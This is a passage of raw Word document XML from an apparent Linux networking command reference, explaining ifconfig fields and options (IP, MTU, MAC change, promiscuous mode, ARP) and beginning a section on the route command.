        <w:t>mtu 1500</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Maximum transmission unit (largest packet size)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73294215" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>inet 192.168.1.100</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: IPv4 address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D91160" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>netmask 255.255.255.0</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Subnet mask (/24 network)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727C3928" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ether 52:54:00:12:34:56</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: MAC address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A9B6F5" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RX/TX packets</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Received/transmitted packet counts and byte totals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DC9F8E" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>errors/dropped/overruns</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Network error counters (0 is good)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E20086" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>txqueuelen 1000</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Transmit queue length for buffering packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763AEAC5" w14:textId="527F7A3D" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Configure IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4D7C74"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 192.168.1.50 netmask 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AC55C5" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Setting static IP address and subnet mask.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E63220F" w14:textId="2632506E" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Bring interface up/down</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1E7BD5"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 up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588160CF"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 down</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766BDB82" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Enable/disable network interfaces for maintenance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D1032A" w14:textId="7336C1CB" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Set broadcast address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47731C54"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 192.168.1.50 netmask 255.255.255.0 broadcast 192.168.1.255</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26129397" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Manually configure broadcast address for custom networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B4CFDD" w14:textId="522E6191" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Change MAC address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00971A1F"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 down</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD1B9A7"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 hw ether 00:11:22:33:44:55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCC23D1"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 up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118700AA" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> MAC address spoofing for testing or privacy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0331376E" w14:textId="339017F3" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Set MTU size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122816E2"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 mtu 1200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27029E1E" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Adjust MTU for specific network requirements or VPN tunnels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A78B05A" w14:textId="2156432B" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Enable promiscuous mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73124329"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 promisc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA76D43" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Capture all network traffic for packet analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18177670" w14:textId="72CAFFF7" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Disable promiscuous mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57276B05"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 -promisc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4191D5" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Return to normal operation after packet capture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54846B40" w14:textId="440034EF" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Add alias (secondary IP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77134C0A"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1 192.168.1.100 netmask 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A591B03" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Configure multiple IP addresses on single interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076E13D7" w14:textId="0FABA609" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Configure point-to-point interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FBD91A"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ppp0 10.0.0.1 pointopoint 10.0.0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC4848C" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Set up point-to-point connections like VPN or dial-up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1DE159" w14:textId="3BDBD0DB" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Set interface metric</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775B0226"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 metric 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796E5E71" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Set routing priority for multi-homed systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2A11F5" w14:textId="08AED896" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Enable/disable ARP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFFB60D"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 arp           # Enable ARP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF7E698"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lastRenderedPageBreak/>
        <w:t>sudo ifconfig eth0 -arp          # Disable ARP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27560ED7" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Control ARP behavior for security or specialized networking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B841BBC" w14:textId="59AF9A2E" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>View specific interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0628B5AB"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ifconfig eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0262A7" w14:textId="3AD85DAF" w:rsidR="001D111D" w:rsidRDefault="001D111D" w:rsidP="0017552F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5F2EF6"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eth0: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70995D82"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inet 192.168.1.100  netmask 255.255.255.0  broadcast 192.168.1.255</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A526FB"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inet6 fe80::5054:ff:fe12:3456  prefixlen 64  scopeid 0x20&lt;link&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D5549C"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ether 52:54:00:12:34:56  txqueuelen 1000  (Ethernet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1BADF4"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RX packets 12845  bytes 15234567 (14.5 MiB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FED35D8"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RX errors 0  dropped 0  overruns 0  frame 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A376EE5"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TX packets 8967  bytes 1234567 (1.1 MiB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA60F58"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TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CE27B4" w14:textId="3722D998" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Check configuration of single interface quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D60247" w14:textId="72693ED6" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Configure with CIDR notation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4222281F"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ifconfig eth0 192.168.1.50/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336A0E4C" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Modern subnet specification using CIDR format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B335B5" w14:textId="514B2445" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>route</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242007CB" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>route</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> command displays and manipulates the IP routing table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD7C292" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F50545A" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:t>Display and modify the kernel's IP routing table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C0B72B" w14:textId="212C717C" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673FC87B"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route [options] [command] [arguments]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FB0B0D" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="00B31277" w:rsidRDefault="0017552F" w:rsidP="00B31277">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B31277">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Common Options</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1256"/>
        <w:gridCol w:w="4982"/>
      </w:tblGrid>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="60F58612" w14:textId="77777777" w:rsidTr="004F482C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DE3A891" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Option</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21C6C162" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="0F5D6C37" w14:textId="77777777" w:rsidTr="004F482C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46254697"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n</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F11F7D5" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Don't resolve names (show numerical addresses)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="0CBCD68F" w14:textId="77777777" w:rsidTr="004F482C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E0D388D"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v</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C3F2009" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Verbose output</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="0295A47A" w14:textId="77777777" w:rsidTr="004F482C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="437FE4E5"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e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C7D00D5" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Use netstat format for display</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="71110416" w14:textId="77777777" w:rsidTr="004F482C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41D39F88"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A family</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E9BFB9F" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Use specified address family (inet, inet6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="6970A91E" w14:textId="77777777" w:rsidTr="004F482C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34D6AD9D"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F</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2ACF2FFC" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Display Forwarding Information Base (FIB)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="34DCA1DE" w14:textId="77777777" w:rsidTr="004F482C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2214C42F" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="004F482C" w:rsidRDefault="0017552F" w:rsidP="004F482C">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004F482C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
              <w:t>-C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11B70237" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Display kernel routing cache</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F3A89BC" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Common Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C29ABB" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F482C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>add</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> - Add a route</w:t>
      </w:r>
    </w:p>
